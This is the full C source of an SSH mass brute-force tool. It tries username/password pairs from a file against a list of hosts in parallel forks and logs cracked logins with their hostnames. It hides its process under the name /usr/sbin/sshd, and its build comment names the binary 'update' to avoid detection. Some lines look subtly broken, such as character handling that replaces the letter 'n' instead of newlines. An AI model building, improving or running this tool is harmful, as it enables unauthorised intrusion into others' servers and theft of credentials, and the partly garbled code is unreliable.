ssh_brute.c

1. /*
2. * cp /usr/local/lib/libssh.so /usr/lib/
3. *
4. * gcc -o update prg.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread
5. *
6. * pass_file format: username password
7. *
8. */
9.  
10. #include <stdio.h>
11. #include <arpa/inet.h>
12. #include <libssh/libssh.h>
13. #include <netinet/in.h>
14. #include <string.h>
15. #include <sys/socket.h>
16. #include <sys/types.h>
17. #include <netdb.h>
18.  
19. #define NORM  "\033[00;00m"
20. #define ALBASTRU "\033[01;34m"
21. #define FAKE "/usr/sbin/sshd" // Fake process
22.  
23. int flag, where;
24.  
25. int shell(SSH_SESSION *session) {
26.     struct timeval;
27.     int err;
28.     BUFFER *readbuf = buffer_new();
29.     time_t start;
30.     CHANNEL *channel;
31.     channel = open_session_channel(session, 1000, 1000);
32.     if (isatty(0)) err = channel_request_pty(channel);
33.     err = channel_request_shell(channel);
34.     start = time(0);
35.     while (channel->open != 0) {
36.         usleep(500000);
37.         err = channel_poll(channel, 0);
38.         if (err > 0) err = channel_read(channel, readbuf, 0, 0);
39.         else if (start + 5 < time(0)) return 1;
40.     }
41.     return 0;
42. }
43.  
44. void checkauth(char *user, char *password, char *host) {
45.     struct hostent *hp;
46.     struct in_addr  *myaddr;
47.     SSH_SESSION *session;
48.     SSH_OPTIONS *options;
49.     int argc = 1;
50.     char *argv[] = { "none" };
51.     FILE *vulnf, *nolog;
52.     where++;
53.     alarm(10);
54.     options = ssh_getopt(&argc, argv);
55.     options_set_username(options, user);
56.     options_set_host(options, host);
57.     session = ssh_connect(options);
58.     if (!session) return;
59.     if (ssh_userauth_password(session, NULL, password) != AUTH_SUCCESS) {
60.         ssh_disconnect(session);
61.         return;
62.     }
63.     if (shell(session)) {
64.         if (!flag) {
65.             myaddr = (struct in_addr*)malloc(sizeof(struct in_addr));
66.             myaddr->s_addr = inet_addr(host);
67.             hp = gethostbyaddr((char *)myaddr, 4, AF_INET);
68.             if ((hp != NULL)) {
69.                 vulnf = fopen("vuln.txt", "a+");
70.                 fprintf(vulnf, "%s:%s %s -> %s\n", user, password, host, hp->h_name);
71.                 printf("\nCracked -> %s:%s %s -> %s\n", user, password, host, hp->h_name);
72.             } else {
73.                 vulnf = fopen("root.txt", "a+");
74.                 fprintf(vulnf, "%s:%s %s -> Can not solve dns\n", user, password, host);
75.                 printf("\nCracked -> %s:%s %s -> Can not solve dns\n", user, password, host);
76.             }
77.             fclose(vulnf);
78.         }
79.     } else {
80.         myaddr = (struct in_addr*)malloc(sizeof(struct in_addr));
81.         myaddr->s_addr = inet_addr(host);
82.         hp = gethostbyaddr((char *)myaddr, 4, AF_INET);
83.         nolog = fopen("nologin.txt", "a+");
84.         if ((hp != NULL)) {
85.             fprintf(nolog, "%s %s %s -> %s\n", user, password, host, hp->h_name);
86.             printf("\nNologin -> %s %s %s -> %s\n", user, password, host, hp->h_name);
87.         } else {
88.             fprintf(nolog, "%s %s %s -> n-are host\n", user, password, host);
89.             printf("\nNologin -> %s %s %s -> n-are host\n", user, password, host);
90.         }
91.         fclose(nolog);
92.     }
93. }
94.  
95. int main(int argc, char **argv) {
96.     FILE *fp, *passf;
97.     char *c, buff[4096], *a[80196], nutt[4096], *temp, *t, *string;
98.     malloc(sizeof(a));
99.     malloc(sizeof(nutt));
100.     int count = 0, i, numforks, maxf;
101.     if ((passf = fopen("pass_file", "r")) == NULL) {
102.         printf("\e[1;31mFATAL: I have not found pass_file\n"NORM);
103.         return -1;
104.     }
105.  
106.     while (fgets(nutt, 2024, passf)) {
107.         while (t = strchr(nutt, 'n')) *t = '.';
108.         temp = strtok(nutt, " ");
109.         string = strdup(temp);
110.         a[count++] = string;
111.         while (temp = strtok(NULL, " ")) {
112.             string = strdup(temp);
113.             a[count++] = string;
114.         }
115.     }
116.     fclose(passf);
117.     if (argc != 2) {
118.         printf("\n\e[1;31m%s <max forks>\n"NORM, argv[0]);
119.         exit(0);
120.     }
121.  
122.     if ((fp = fopen("mfu.txt", "r")) == NULL) exit(printf("\e[1;31mFATAL: I can't open mfu.txt\n"NORM));
123.     printf("# SSH Mass Bruteforcer\n"NORM);
124.     maxf = atoi(argv[1]);
125.     strcpy(argv[0], FAKE);
126.     while (fgets(buff, sizeof(buff), fp)) {
127.         c = strchr(buff, 'n');
128.         if (c != NULL) *c = '.';
129.         if (!(fork())) {
130.             where = 0;
131.             for (i = 0; i < count; i = i + 2) {
132.                 checkauth(a[i], a[i + 1], buff);
133.             }
134.             exit(0);
135.         } else {
136.             numforks++;
137.             if (numforks > maxf)
138.                 for (numforks; numforks > maxf; numforks--)
139.                     wait(NULL);
140.         }
141.     }
142. }